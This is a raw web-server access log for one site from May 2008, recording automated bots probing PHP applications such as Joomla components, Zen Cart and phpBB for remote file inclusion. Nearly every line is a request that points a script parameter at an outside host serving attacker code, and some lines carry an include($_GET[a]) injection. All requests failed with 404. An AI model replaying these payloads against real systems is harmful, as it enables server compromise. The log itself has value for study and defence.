58.26.137.64 - - [19/May/2008:09:00:11 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:00:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:09:00:47 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:00:48 -0700] "GET /logs/access_080215.log//forums//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.71.102.187 - - [19/May/2008:09:00:50 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:01:01 -0700] "GET /logs/access_080131.log/includes/include_once.php?include_file=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:01:01 -0700] "GET /logs/includes/include_once.php?include_file=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:01:11 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:01:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
168.158.128.26 - - [19/May/2008:09:01:13 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.buysell-local.es/uploaded/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.67.157.165 - - [19/May/2008:09:01:50 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.17.101.27 - - [19/May/2008:09:02:03 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:03:02 -0700] "GET /logs/access.log//components/com_forum/download.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:03:08 -0700] "GET //components/com_forum/download.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.2.66.132 - - [19/May/2008:09:03:10 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:03:26 -0700] "GET /logs/access_080131.log/includes/include_once.php?include_file=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:03:26 -0700] "GET /logs/includes/include_once.php?include_file=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.188.60.54 - - [19/May/2008:09:03:26 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.126.175.155 - - [19/May/2008:09:03:32 -0700] "GET /logs/access_080218.log/index.php?mosConfig_absolute_path=http://www.nationsiam.com/components/com_akogallery/img_pictures/love.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:03:40 -0700] "GET /logs/access_080215.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:03:41 -0700] "GET //MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:03:41 -0700] "GET /logs//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:03:41 -0700] "GET /logs/access_080225.log//MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.203.6 - - [19/May/2008:09:03:44 -0700] "GET /logs/access_080223.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.203.6 - - [19/May/2008:09:03:44 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.203.6 - - [19/May/2008:09:03:44 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:03:46 -0700] "GET /logs/access_080223.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:03:46 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:03:47 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:03:49 -0700] "GET /logs/access.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:03:49 -0700] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:03:50 -0700] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:04:02 -0700] "GET /logs/access_080223.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:04:02 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:04:02 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:04:03 -0700] "GET /logs//citywriter/head.php?path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:04:03 -0700] "GET //citywriter/head.php?path=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:04:15 -0700] "GET /logs/access_080215.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:04:15 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:04:15 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:04:16 -0700] "GET /logs/access_080225.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.203.6 - - [19/May/2008:09:04:20 -0700] "GET /logs/access_080117.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:04:21 -0700] "GET /logs/access_080117.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:04:47 -0700] "GET /logs/access_080117.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:04:56 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.114.220.160 - - [19/May/2008:09:04:57 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.cyos.co.kr/bbs//skin/zero_vote/10.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:05:15 -0700] "GET /logs/access_080223.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:05:16 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:05:16 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:09:05:39 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
203.116.91.54 - - [19/May/2008:09:05:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/rinasarmila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
195.85.130.159 - - [19/May/2008:09:05:42 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:05:51 -0700] "GET /logs/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:05:52 -0700] "GET /errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:09:06:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.73.138.225 - - [19/May/2008:09:06:30 -0700] "GET /logs/access_080218.log/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://maxbidder.com/uploaded/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [19/May/2008:09:06:30 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.aeromexicov.org/galeria/backups/cmd?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:09:06:51 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.173.1.8 - - [19/May/2008:09:06:51 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.midweststeelinc.com/images/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:06:53 -0700] "GET /logs/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:06:54 -0700] "GET /errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.101.69 - - [19/May/2008:09:07:00 -0700] "GET /logs/access_080117.log/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:07:00 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [19/May/2008:09:07:01 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://83.222.131.90/~legitimi/mybase/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:07:11 -0700] "GET /logs/access_080312.log/includes/include_once.php?include_file=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:07:17 -0700] "GET /logs/access_080312.log/includes/include_once.php?include_file=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.126.175.155 - - [19/May/2008:09:07:25 -0700] "GET /logs/access_080327.log/index.php?mosConfig_absolute_path=http://www.nationsiam.com/components/com_akogallery/img_pictures/love.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:07:38 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:07:38 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:07:39 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.82.209.212 - - [19/May/2008:09:07:46 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:07:49 -0700] "GET /logs/access_080312.log/includes/include_once.php?include_file=http://lab.matrixl.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:07:49 -0700] "GET //MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [19/May/2008:09:07:50 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://injekz.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:52 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:52 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:53 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:55 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:55 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:55 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:56 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:07:58 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:08:01 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.34.164.89 - - [19/May/2008:09:08:01 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:08:02 -0700] "GET /logs/access.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:08:02 -0700] "GET //administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:08:03 -0700] "GET /logs//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:08:05 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:08:05 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [19/May/2008:09:08:05 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.health.grupra.com/modules/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.51.232.116 - - [19/May/2008:09:08:07 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [19/May/2008:09:08:08 -0700] "GET /logs/access_080312.log/includes/include_once.php?include_file=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:08:17 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.92 - - [19/May/2008:09:08:18 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:08:18 -0700] "GET /logs/errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:08:18 -0700] "GET /errors.php?error=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.130.2.11 - - [19/May/2008:09:08:47 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.11 - - [19/May/2008:09:08:47 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.130.2.11 - - [19/May/2008:09:08:47 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:08:54 -0700] "GET /logs/cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.43.232 - - [19/May/2008:09:08:54 -0700] "GET /cart/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.130.2.11 - - [19/May/2008:09:08:55 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.56.107 - - [19/May/2008:09:08:58 -0700] "GET /logs/access_080211.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.56.107 - - [19/May/2008:09:08:58 -0700] "GET //mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.56.107 - - [19/May/2008:09:08:58 -0700] "GET /logs//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.94.56.107 - - [19/May/2008:09:09:02 -0700] "GET /logs/access_080122.log//mygallery/myfunctions/mygallerybrowser.php?myPath=http://1nb0x.iespana.es/t3st??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.162.13.240 - - [19/May/2008:09:09:04 -0700] "GET /logs/access_080220.log//administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
